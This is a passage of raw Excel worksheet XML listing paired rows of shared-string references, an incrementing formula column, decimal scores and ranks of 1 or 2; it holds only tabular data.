        <v>2</v>
      </c>
    </row>
    <row r="1218" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1218" t="s">
        <v>2335</v>
      </c>
      <c r="B1218" t="s">
        <v>2336</v>
      </c>
      <c r="C1218">
        <f t="shared" si="18"/>
        <v>10955089</v>
      </c>
      <c r="D1218" t="s">
        <v>2337</v>
      </c>
      <c r="E1218">
        <v>28.26344108581543</v>
      </c>
      <c r="F1218">
        <v>1</v>
      </c>
    </row>
    <row r="1219" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1219" t="s">
        <v>2335</v>
      </c>
      <c r="B1219" t="s">
        <v>2336</v>
      </c>
      <c r="C1219">
        <f t="shared" si="18"/>
        <v>10956342</v>
      </c>
      <c r="D1219" t="s">
        <v>2338</v>
      </c>
      <c r="E1219">
        <v>0.44622179865837103</v>
      </c>
      <c r="F1219">
        <v>2</v>
      </c>
    </row>
    <row r="1220" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1220" t="s">
        <v>2339</v>
      </c>
      <c r="B1220" t="s">
        <v>2340</v>
      </c>
      <c r="C1220">
        <f t="shared" si="18"/>
        <v>10957595</v>
      </c>
      <c r="D1220" t="s">
        <v>2341</v>
      </c>
      <c r="E1220">
        <v>26.047494888305661</v>
      </c>
      <c r="F1220">
        <v>1</v>
      </c>
    </row>
    <row r="1221" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1221" t="s">
        <v>2339</v>
      </c>
      <c r="B1221" t="s">
        <v>2340</v>
      </c>
      <c r="C1221">
        <f t="shared" si="18"/>
        <v>10958848</v>
      </c>
      <c r="D1221" t="s">
        <v>2342</v>
      </c>
      <c r="E1221">
        <v>8.6598791182041168E-2</v>
      </c>
      <c r="F1221">
        <v>2</v>
      </c>
    </row>
    <row r="1222" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1222" t="s">
        <v>2343</v>
      </c>
      <c r="B1222" t="s">
        <v>2344</v>
      </c>
      <c r="C1222">
        <f t="shared" si="18"/>
        <v>10960101</v>
      </c>
      <c r="D1222" t="s">
        <v>2345</v>
      </c>
      <c r="E1222">
        <v>34.247966766357422</v>
      </c>
      <c r="F1222">
        <v>1</v>
      </c>
    </row>
    <row r="1223" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1223" t="s">
        <v>2343</v>
      </c>
      <c r="B1223" t="s">
        <v>2344</v>
      </c>
      <c r="C1223">
        <f t="shared" si="18"/>
        <v>10961354</v>
      </c>
      <c r="D1223" t="s">
        <v>2346</v>
      </c>
      <c r="E1223">
        <v>7.2331366539001456</v>
      </c>
      <c r="F1223">
        <v>2</v>
      </c>
    </row>
    <row r="1224" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1224" t="s">
        <v>2347</v>
      </c>
      <c r="B1224" t="s">
        <v>2348</v>
      </c>
      <c r="C1224">
        <f t="shared" si="18"/>
        <v>10962607</v>
      </c>
      <c r="D1224" t="s">
        <v>2349</v>
      </c>
      <c r="E1224">
        <v>19.679279327392582</v>
      </c>
      <c r="F1224">
        <v>1</v>
      </c>
    </row>
    <row r="1225" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1225" t="s">
        <v>2347</v>
      </c>
      <c r="B1225" t="s">
        <v>2348</v>
      </c>
      <c r="C1225">
        <f t="shared" si="18"/>
        <v>10963860</v>
      </c>
      <c r="D1225" t="s">
        <v>2350</v>
      </c>
      <c r="E1225">
        <v>8.2463340759277344</v>
      </c>
      <c r="F1225">
        <v>2</v>
      </c>
    </row>
    <row r="1226" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1226" t="s">
        <v>2351</v>
      </c>
      <c r="B1226" t="s">
        <v>2352</v>
      </c>
      <c r="C1226">
        <f t="shared" ref="C1226:C1289" si="19">C1225+1253</f>
        <v>10965113</v>
      </c>
      <c r="D1226" t="s">
        <v>1585</v>
      </c>
      <c r="E1226">
        <v>29.838937759399411</v>
      </c>
      <c r="F1226">
        <v>1</v>
      </c>
    </row>
    <row r="1227" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1227" t="s">
        <v>2351</v>
      </c>
      <c r="B1227" t="s">
        <v>2352</v>
      </c>
      <c r="C1227">
        <f t="shared" si="19"/>
        <v>10966366</v>
      </c>
      <c r="D1227" t="s">
        <v>2353</v>
      </c>
      <c r="E1227">
        <v>1.649685204029083E-3</v>
      </c>
      <c r="F1227">
        <v>2</v>
      </c>
    </row>
    <row r="1228" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1228" t="s">
        <v>2354</v>
      </c>
      <c r="B1228" t="s">
        <v>2355</v>
      </c>
      <c r="C1228">
        <f t="shared" si="19"/>
        <v>10967619</v>
      </c>
      <c r="D1228" t="s">
        <v>2356</v>
      </c>
      <c r="E1228">
        <v>38.602310180664063</v>
      </c>
      <c r="F1228">
        <v>1</v>
      </c>
    </row>
    <row r="1229" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1229" t="s">
        <v>2354</v>
      </c>
      <c r="B1229" t="s">
        <v>2355</v>
      </c>
      <c r="C1229">
        <f t="shared" si="19"/>
        <v>10968872</v>
      </c>
      <c r="D1229" t="s">
        <v>2357</v>
      </c>
      <c r="E1229">
        <v>1.420758962631226</v>
      </c>
      <c r="F1229">
        <v>2</v>
      </c>
    </row>
    <row r="1230" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1230" t="s">
        <v>2358</v>
      </c>
      <c r="B1230" t="s">
        <v>2359</v>
      </c>
      <c r="C1230">
        <f t="shared" si="19"/>
        <v>10970125</v>
      </c>
      <c r="D1230" t="s">
        <v>2360</v>
      </c>
      <c r="E1230">
        <v>29.12934684753418</v>
      </c>
      <c r="F1230">
        <v>1</v>
      </c>
    </row>
    <row r="1231" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1231" t="s">
        <v>2358</v>
      </c>
      <c r="B1231" t="s">
        <v>2359</v>
      </c>
      <c r="C1231">
        <f t="shared" si="19"/>
        <v>10971378</v>
      </c>
      <c r="D1231" t="s">
        <v>2361</v>
      </c>
      <c r="E1231">
        <v>10.59991550445557</v>
      </c>
      <c r="F1231">
        <v>2</v>
      </c>
    </row>
    <row r="1232" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1232" t="s">
        <v>2362</v>
      </c>
      <c r="B1232" t="s">
        <v>2363</v>
      </c>
      <c r="C1232">
        <f t="shared" si="19"/>
        <v>10972631</v>
      </c>
      <c r="D1232" t="s">
        <v>1577</v>
      </c>
      <c r="E1232">
        <v>22.05522537231445</v>
      </c>
      <c r="F1232">
        <v>1</v>
      </c>
    </row>
    <row r="1233" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1233" t="s">
        <v>2362</v>
      </c>
      <c r="B1233" t="s">
        <v>2363</v>
      </c>
      <c r="C1233">
        <f t="shared" si="19"/>
        <v>10973884</v>
      </c>
      <c r="D1233" t="s">
        <v>2364</v>
      </c>
      <c r="E1233">
        <v>15.90653038024902</v>
      </c>
      <c r="F1233">
        <v>2</v>
      </c>
    </row>
    <row r="1234" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1234" t="s">
        <v>2365</v>
      </c>
      <c r="B1234" t="s">
        <v>2366</v>
      </c>
      <c r="C1234">
        <f t="shared" si="19"/>
        <v>10975137</v>
      </c>
      <c r="D1234" t="s">
        <v>1634</v>
      </c>
      <c r="E1234">
        <v>25.861665725708011</v>
      </c>
      <c r="F1234">
        <v>1</v>
      </c>
    </row>
    <row r="1235" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1235" t="s">
        <v>2365</v>
      </c>
      <c r="B1235" t="s">
        <v>2366</v>
      </c>
      <c r="C1235">
        <f t="shared" si="19"/>
        <v>10976390</v>
      </c>
      <c r="D1235" t="s">
        <v>2367</v>
      </c>
      <c r="E1235">
        <v>1.6868385137058789E-4</v>
      </c>
      <c r="F1235">
        <v>2</v>
      </c>
    </row>
    <row r="1236" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1236" t="s">
        <v>2368</v>
      </c>
      <c r="B1236" t="s">
        <v>2369</v>
      </c>
      <c r="C1236">
        <f t="shared" si="19"/>
        <v>10977643</v>
      </c>
      <c r="D1236" t="s">
        <v>1654</v>
      </c>
      <c r="E1236">
        <v>29.21403884887695</v>
      </c>
      <c r="F1236">
        <v>1</v>
      </c>
    </row>
    <row r="1237" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1237" t="s">
        <v>2368</v>
      </c>
      <c r="B1237" t="s">
        <v>2369</v>
      </c>
      <c r="C1237">
        <f t="shared" si="19"/>
        <v>10978896</v>
      </c>
      <c r="D1237" t="s">
        <v>2370</v>
      </c>
      <c r="E1237">
        <v>10.74191284179688</v>
      </c>
      <c r="F1237">
        <v>2</v>
      </c>
    </row>
    <row r="1238" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1238" t="s">
        <v>2371</v>
      </c>
      <c r="B1238" t="s">
        <v>2372</v>
      </c>
      <c r="C1238">
        <f t="shared" si="19"/>
        <v>10980149</v>
      </c>
      <c r="D1238" t="s">
        <v>1658</v>
      </c>
      <c r="E1238">
        <v>27.115190505981449</v>
      </c>
      <c r="F1238">
        <v>1</v>
      </c>
    </row>
    <row r="1239" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1239" t="s">
        <v>2371</v>
      </c>
      <c r="B1239" t="s">
        <v>2372</v>
      </c>
      <c r="C1239">
        <f t="shared" si="19"/>
        <v>10981402</v>
      </c>
      <c r="D1239" t="s">
        <v>2373</v>
      </c>
      <c r="E1239">
        <v>3.7797551155090332</v>
      </c>
      <c r="F1239">
        <v>2</v>
      </c>
    </row>
    <row r="1240" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1240" t="s">
        <v>2374</v>
      </c>
      <c r="B1240" t="s">
        <v>2375</v>
      </c>
      <c r="C1240">
        <f t="shared" si="19"/>
        <v>10982655</v>
      </c>
      <c r="D1240" t="s">
        <v>2376</v>
      </c>
      <c r="E1240">
        <v>26.884317398071289</v>
      </c>
      <c r="F1240">
        <v>1</v>
      </c>
    </row>
    <row r="1241" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1241" t="s">
        <v>2374</v>
      </c>
      <c r="B1241" t="s">
        <v>2375</v>
      </c>
      <c r="C1241">
        <f t="shared" si="19"/>
        <v>10983908</v>
      </c>
      <c r="D1241" t="s">
        <v>2377</v>
      </c>
      <c r="E1241">
        <v>6.2000031471252441</v>
      </c>
      <c r="F1241">
        <v>2</v>
      </c>
    </row>
    <row r="1242" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1242" t="s">
        <v>2378</v>
      </c>
      <c r="B1242" t="s">
        <v>2379</v>
      </c>
      <c r="C1242">
        <f t="shared" si="19"/>
        <v>10985161</v>
      </c>
      <c r="D1242" t="s">
        <v>2380</v>
      </c>
      <c r="E1242">
        <v>28.7208251953125</v>
      </c>
      <c r="F1242">
        <v>1</v>
      </c>
    </row>
    <row r="1243" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1243" t="s">
        <v>2378</v>
      </c>
      <c r="B1243" t="s">
        <v>2379</v>
      </c>
      <c r="C1243">
        <f t="shared" si="19"/>
        <v>10986414</v>
      </c>
      <c r="D1243" t="s">
        <v>2381</v>
      </c>
      <c r="E1243">
        <v>11.753707885742189</v>
      </c>
      <c r="F1243">
        <v>2</v>
      </c>
    </row>
    <row r="1244" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1244" t="s">
        <v>2382</v>
      </c>
      <c r="B1244" t="s">
        <v>2383</v>
      </c>
      <c r="C1244">
        <f t="shared" si="19"/>
        <v>10987667</v>
      </c>
      <c r="D1244" t="s">
        <v>2384</v>
      </c>
      <c r="E1244">
        <v>39.098285675048828</v>
      </c>
      <c r="F1244">
        <v>1</v>
      </c>
    </row>
    <row r="1245" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1245" t="s">
        <v>2382</v>
      </c>
      <c r="B1245" t="s">
        <v>2383</v>
      </c>
      <c r="C1245">
        <f t="shared" si="19"/>
        <v>10988920</v>
      </c>
      <c r="D1245" t="s">
        <v>2385</v>
      </c>
      <c r="E1245">
        <v>2.986617803573608</v>
      </c>
      <c r="F1245">
        <v>2</v>
      </c>
    </row>
    <row r="1246" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1246" t="s">
        <v>2386</v>
      </c>
      <c r="B1246" t="s">
        <v>2387</v>
      </c>
      <c r="C1246">
        <f t="shared" si="19"/>
        <v>10990173</v>
      </c>
      <c r="D1246" t="s">
        <v>2388</v>
      </c>
      <c r="E1246">
        <v>27.331720352172852</v>
      </c>
      <c r="F1246">
        <v>1</v>
      </c>
    </row>
    <row r="1247" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1247" t="s">
        <v>2386</v>
      </c>
      <c r="B1247" t="s">
        <v>2387</v>
      </c>
      <c r="C1247">
        <f t="shared" si="19"/>
        <v>10991426</v>
      </c>
      <c r="D1247" t="s">
        <v>2389</v>
      </c>
      <c r="E1247">
        <v>2.8248217105865479</v>
      </c>
      <c r="F1247">
        <v>2</v>
      </c>
    </row>
    <row r="1248" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1248" t="s">
        <v>2390</v>
      </c>
      <c r="B1248" t="s">
        <v>2391</v>
      </c>
      <c r="C1248">
        <f t="shared" si="19"/>
        <v>10992679</v>
      </c>
      <c r="D1248" t="s">
        <v>2392</v>
      </c>
      <c r="E1248">
        <v>25.457412719726559</v>
      </c>
      <c r="F1248">
        <v>1</v>
      </c>
    </row>
    <row r="1249" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1249" t="s">
        <v>2390</v>
      </c>
      <c r="B1249" t="s">
        <v>2391</v>
      </c>
      <c r="C1249">
        <f t="shared" si="19"/>
        <v>10993932</v>
      </c>
      <c r="D1249" t="s">
        <v>2393</v>
      </c>
      <c r="E1249">
        <v>10.715737342834471</v>
      </c>
      <c r="F1249">
        <v>2</v>
      </c>
    </row>
    <row r="1250" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1250" t="s">
        <v>2394</v>
      </c>
      <c r="B1250" t="s">
        <v>2395</v>
      </c>
      <c r="C1250">
        <f t="shared" si="19"/>
        <v>10995185</v>
      </c>
      <c r="D1250" t="s">
        <v>2396</v>
      </c>
      <c r="E1250">
        <v>32.108806610107422</v>
      </c>
      <c r="F1250">
        <v>1</v>
      </c>
    </row>
    <row r="1251" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1251" t="s">
        <v>2394</v>
      </c>
      <c r="B1251" t="s">
        <v>2395</v>
      </c>
      <c r="C1251">
        <f t="shared" si="19"/>
        <v>10996438</v>
      </c>
      <c r="D1251" t="s">
        <v>2397</v>
      </c>
      <c r="E1251">
        <v>3.3420403003692631</v>
      </c>
      <c r="F1251">
        <v>2</v>
      </c>
    </row>
    <row r="1252" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1252" t="s">
        <v>2398</v>
      </c>
      <c r="B1252" t="s">
        <v>2399</v>
      </c>
      <c r="C1252">
        <f t="shared" si="19"/>
        <v>10997691</v>
      </c>
      <c r="D1252" t="s">
        <v>2400</v>
      </c>
      <c r="E1252">
        <v>17.235908508300781</v>
      </c>
      <c r="F1252">
        <v>1</v>
      </c>
    </row>
    <row r="1253" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1253" t="s">
        <v>2398</v>
      </c>
      <c r="B1253" t="s">
        <v>2399</v>
      </c>
      <c r="C1253">
        <f t="shared" si="19"/>
        <v>10998944</v>
      </c>
      <c r="D1253" t="s">
        <v>2401</v>
      </c>
      <c r="E1253">
        <v>10.60580253601074</v>
      </c>
      <c r="F1253">
        <v>2</v>
      </c>
    </row>
    <row r="1254" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1254" t="s">
        <v>2402</v>
      </c>
      <c r="B1254" t="s">
        <v>2403</v>
      </c>
      <c r="C1254">
        <f t="shared" si="19"/>
        <v>11000197</v>
      </c>
      <c r="D1254" t="s">
        <v>2404</v>
      </c>
      <c r="E1254">
        <v>12.555092811584471</v>
      </c>
      <c r="F1254">
        <v>1</v>
      </c>
    </row>
    <row r="1255" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1255" t="s">
        <v>2402</v>
      </c>
      <c r="B1255" t="s">
        <v>2403</v>
      </c>
      <c r="C1255">
        <f t="shared" si="19"/>
        <v>11001450</v>
      </c>
      <c r="D1255" t="s">
        <v>2405</v>
      </c>
      <c r="E1255">
        <v>0.67724919319152832</v>
      </c>
      <c r="F1255">
        <v>2</v>
      </c>
    </row>
    <row r="1256" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1256" t="s">
        <v>2406</v>
      </c>
      <c r="B1256" t="s">
        <v>2407</v>
      </c>
      <c r="C1256">
        <f t="shared" si="19"/>
        <v>11002703</v>
      </c>
      <c r="D1256" t="s">
        <v>2408</v>
      </c>
      <c r="E1256">
        <v>29.37668609619141</v>
      </c>
      <c r="F1256">
        <v>1</v>
      </c>
    </row>
    <row r="1257" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1257" t="s">
        <v>2406</v>
      </c>
      <c r="B1257" t="s">
        <v>2407</v>
      </c>
      <c r="C1257">
        <f t="shared" si="19"/>
        <v>11003956</v>
      </c>
      <c r="D1257" t="s">
        <v>2409</v>
      </c>
      <c r="E1257">
        <v>13.271659851074221</v>
      </c>
      <c r="F1257">
        <v>2</v>
      </c>
    </row>
    <row r="1258" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1258" t="s">
        <v>2410</v>
      </c>
      <c r="B1258" t="s">
        <v>2411</v>
      </c>
      <c r="C1258">
        <f t="shared" si="19"/>
        <v>11005209</v>
      </c>
      <c r="D1258" t="s">
        <v>2412</v>
      </c>
      <c r="E1258">
        <v>20.97434234619141</v>
      </c>
      <c r="F1258">
        <v>1</v>
      </c>
    </row>
    <row r="1259" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1259" t="s">
        <v>2410</v>
      </c>
      <c r="B1259" t="s">
        <v>2411</v>
      </c>
      <c r="C1259">
        <f t="shared" si="19"/>
        <v>11006462</v>
      </c>
      <c r="D1259" t="s">
        <v>2413</v>
      </c>
      <c r="E1259">
        <v>14.332887649536129</v>
      </c>
      <c r="F1259">
        <v>2</v>
      </c>
    </row>
    <row r="1260" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1260" t="s">
        <v>2414</v>
      </c>
      <c r="B1260" t="s">
        <v>2415</v>
      </c>
      <c r="C1260">
        <f t="shared" si="19"/>
        <v>11007715</v>
      </c>
      <c r="D1260" t="s">
        <v>2416</v>
      </c>
      <c r="E1260">
        <v>37.356678009033203</v>
      </c>
      <c r="F1260">
        <v>1</v>
      </c>
    </row>
    <row r="1261" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1261" t="s">
        <v>2414</v>
      </c>
      <c r="B1261" t="s">
        <v>2415</v>
      </c>
      <c r="C1261">
        <f t="shared" si="19"/>
        <v>11008968</v>
      </c>
      <c r="D1261" t="s">
        <v>2417</v>
      </c>
      <c r="E1261">
        <v>3.5484940744936471E-3</v>
      </c>
      <c r="F1261">
        <v>2</v>
      </c>
    </row>
    <row r="1262" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1262" t="s">
        <v>2418</v>
      </c>
      <c r="B1262" t="s">
        <v>2419</v>
      </c>
      <c r="C1262">
        <f t="shared" si="19"/>
        <v>11010221</v>
      </c>
      <c r="D1262" t="s">
        <v>2420</v>
      </c>
      <c r="E1262">
        <v>31.764408111572269</v>
      </c>
      <c r="F1262">
        <v>1</v>
      </c>
    </row>
    <row r="1263" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1263" t="s">
        <v>2418</v>
      </c>
      <c r="B1263" t="s">
        <v>2419</v>
      </c>
      <c r="C1263">
        <f t="shared" si="19"/>
        <v>11011474</v>
      </c>
      <c r="D1263" t="s">
        <v>2421</v>
      </c>
      <c r="E1263">
        <v>4.1149091720581046</v>
      </c>
      <c r="F1263">
        <v>2</v>
      </c>
    </row>
    <row r="1264" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1264" t="s">
        <v>2422</v>
      </c>
      <c r="B1264" t="s">
        <v>2423</v>
      </c>
      <c r="C1264">
        <f t="shared" si="19"/>
        <v>11012727</v>
      </c>
      <c r="D1264" t="s">
        <v>2424</v>
      </c>
      <c r="E1264">
        <v>26.240169525146481</v>
      </c>
      <c r="F1264">
        <v>1</v>
      </c>
    </row>
    <row r="1265" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1265" t="s">
        <v>2422</v>
      </c>
      <c r="B1265" t="s">
        <v>2423</v>
      </c>
      <c r="C1265">
        <f t="shared" si="19"/>
        <v>11013980</v>
      </c>
      <c r="D1265" t="s">
        <v>2425</v>
      </c>
      <c r="E1265">
        <v>4.8415050506591797</v>
      </c>
      <c r="F1265">
        <v>2</v>
      </c>
    </row>
    <row r="1266" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1266" t="s">
        <v>2426</v>
      </c>
      <c r="B1266" t="s">
        <v>2427</v>
      </c>
      <c r="C1266">
        <f t="shared" si="19"/>
        <v>11015233</v>
      </c>
      <c r="D1266" t="s">
        <v>2428</v>
      </c>
      <c r="E1266">
        <v>35.496608734130859</v>
      </c>
      <c r="F1266">
        <v>1</v>
      </c>
    </row>
    <row r="1267" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1267" t="s">
        <v>2426</v>
      </c>
      <c r="B1267" t="s">
        <v>2427</v>
      </c>
      <c r="C1267">
        <f t="shared" si="19"/>
        <v>11016486</v>
      </c>
      <c r="D1267" t="s">
        <v>2429</v>
      </c>
      <c r="E1267">
        <v>11.38018226623535</v>
      </c>
      <c r="F1267">
        <v>2</v>
      </c>
    </row>
    <row r="1268" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1268" t="s">
        <v>2430</v>
      </c>
      <c r="B1268" t="s">
        <v>2431</v>
      </c>
      <c r="C1268">
        <f t="shared" si="19"/>
        <v>11017739</v>
      </c>
      <c r="D1268" t="s">
        <v>2432</v>
      </c>
      <c r="E1268">
        <v>30.168622970581051</v>
      </c>
      <c r="F1268">
        <v>1</v>
      </c>
    </row>
    <row r="1269" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1269" t="s">
        <v>2430</v>
      </c>
      <c r="B1269" t="s">
        <v>2431</v>
      </c>
      <c r="C1269">
        <f t="shared" si="19"/>
        <v>11018992</v>
      </c>
      <c r="D1269" t="s">
        <v>2433</v>
      </c>
      <c r="E1269">
        <v>14.270511627197269</v>
      </c>
      <c r="F1269">
        <v>2</v>
      </c>
    </row>
    <row r="1270" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1270" t="s">
        <v>2434</v>
      </c>
      <c r="B1270" t="s">
        <v>2435</v>
      </c>
      <c r="C1270">
        <f t="shared" si="19"/>
        <v>11020245</v>
      </c>
      <c r="D1270" t="s">
        <v>2436</v>
      </c>
      <c r="E1270">
        <v>25.035634994506839</v>
      </c>
      <c r="F1270">
        <v>1</v>
      </c>
    </row>
    <row r="1271" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1271" t="s">
        <v>2434</v>
      </c>
      <c r="B1271" t="s">
        <v>2435</v>
      </c>
      <c r="C1271">
        <f t="shared" si="19"/>
        <v>11021498</v>
      </c>
      <c r="D1271" t="s">
        <v>2437</v>
      </c>
      <c r="E1271">
        <v>2.9166033267974849</v>
      </c>
      <c r="F1271">
        <v>2</v>
      </c>
    </row>
    <row r="1272" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1272" t="s">
        <v>2438</v>
      </c>
      <c r="B1272" t="s">
        <v>2439</v>
      </c>
      <c r="C1272">
        <f t="shared" si="19"/>
        <v>11022751</v>
      </c>
      <c r="D1272" t="s">
        <v>2440</v>
      </c>
      <c r="E1272">
        <v>35.006484985351563</v>
      </c>
      <c r="F1272">
        <v>1</v>
      </c>
    </row>
    <row r="1273" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1273" t="s">
        <v>2438</v>
      </c>
      <c r="B1273" t="s">
        <v>2439</v>
      </c>
      <c r="C1273">
        <f t="shared" si="19"/>
        <v>11024004</v>
      </c>
      <c r="D1273" t="s">
        <v>2441</v>
      </c>
      <c r="E1273">
        <v>14.827438354492189</v>
      </c>
      <c r="F1273">
        <v>2</v>
      </c>
    </row>
    <row r="1274" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1274" t="s">
        <v>2442</v>
      </c>
      <c r="B1274" t="s">
        <v>2443</v>
      </c>
      <c r="C1274">
        <f t="shared" si="19"/>
        <v>11025257</v>
      </c>
      <c r="D1274" t="s">
        <v>2444</v>
      </c>
      <c r="E1274">
        <v>30.053745269775391</v>
      </c>
      <c r="F1274">
        <v>1</v>
      </c>
    </row>
    <row r="1275" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1275" t="s">
        <v>2442</v>
      </c>
      <c r="B1275" t="s">
        <v>2443</v>
      </c>
      <c r="C1275">
        <f t="shared" si="19"/>
        <v>11026510</v>
      </c>
      <c r="D1275" t="s">
        <v>2445</v>
      </c>
      <c r="E1275">
        <v>14.81461715698242</v>
      </c>
      <c r="F1275">
        <v>2</v>
      </c>
    </row>
    <row r="1276" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1276" t="s">
        <v>2446</v>
      </c>
      <c r="B1276" t="s">
        <v>2447</v>
      </c>
      <c r="C1276">
        <f t="shared" si="19"/>
        <v>11027763</v>
      </c>
      <c r="D1276" t="s">
        <v>2448</v>
      </c>
      <c r="E1276">
        <v>28.86892127990723</v>
      </c>
      <c r="F1276">
        <v>1</v>
      </c>
    </row>
    <row r="1277" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1277" t="s">
        <v>2446</v>
      </c>
      <c r="B1277" t="s">
        <v>2447</v>
      </c>
      <c r="C1277">
        <f t="shared" si="19"/>
        <v>11029016</v>
      </c>
      <c r="D1277" t="s">
        <v>2449</v>
      </c>
      <c r="E1277">
        <v>5.6501078605651864</v>
      </c>
      <c r="F1277">
        <v>2</v>
      </c>
    </row>
    <row r="1278" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1278" t="s">
        <v>2450</v>
      </c>
      <c r="B1278" t="s">
        <v>2451</v>
      </c>
      <c r="C1278">
        <f t="shared" si="19"/>
        <v>11030269</v>
      </c>
      <c r="D1278" t="s">
        <v>2452</v>
      </c>
      <c r="E1278">
        <v>25.649044036865231</v>
      </c>
      <c r="F1278">
        <v>1</v>
      </c>
    </row>
    <row r="1279" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1279" t="s">
        <v>2450</v>
      </c>
      <c r="B1279" t="s">
        <v>2451</v>
      </c>
      <c r="C1279">
        <f t="shared" si="19"/>
        <v>11031522</v>
      </c>
      <c r="D1279" t="s">
        <v>2453</v>
      </c>
      <c r="E1279">
        <v>8.1964836120605469</v>
      </c>
      <c r="F1279">
        <v>2</v>
      </c>
    </row>
    <row r="1280" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1280" t="s">
        <v>2454</v>
      </c>
      <c r="B1280" t="s">
        <v>2455</v>
      </c>
      <c r="C1280">
        <f t="shared" si="19"/>
        <v>11032775</v>
      </c>
      <c r="D1280" t="s">
        <v>2456</v>
      </c>
      <c r="E1280">
        <v>29.597846984863281</v>
      </c>
      <c r="F1280">
        <v>1</v>
      </c>
    </row>
    <row r="1281" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1281" t="s">
        <v>2454</v>
      </c>
      <c r="B1281" t="s">
        <v>2455</v>
      </c>
      <c r="C1281">
        <f t="shared" si="19"/>
        <v>11034028</v>
      </c>
      <c r="D1281" t="s">
        <v>2457</v>
      </c>
      <c r="E1281">
        <v>11.51376152038574</v>
      </c>
      <c r="F1281">
        <v>2</v>
      </c>
    </row>
    <row r="1282" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1282" t="s">
        <v>2458</v>
      </c>
      <c r="B1282" t="s">
        <v>2459</v>
      </c>
      <c r="C1282">
        <f t="shared" si="19"/>
        <v>11035281</v>
      </c>
      <c r="D1282" t="s">
        <v>286</v>
      </c>
      <c r="E1282">
        <v>28.667184829711911</v>
      </c>
      <c r="F1282">
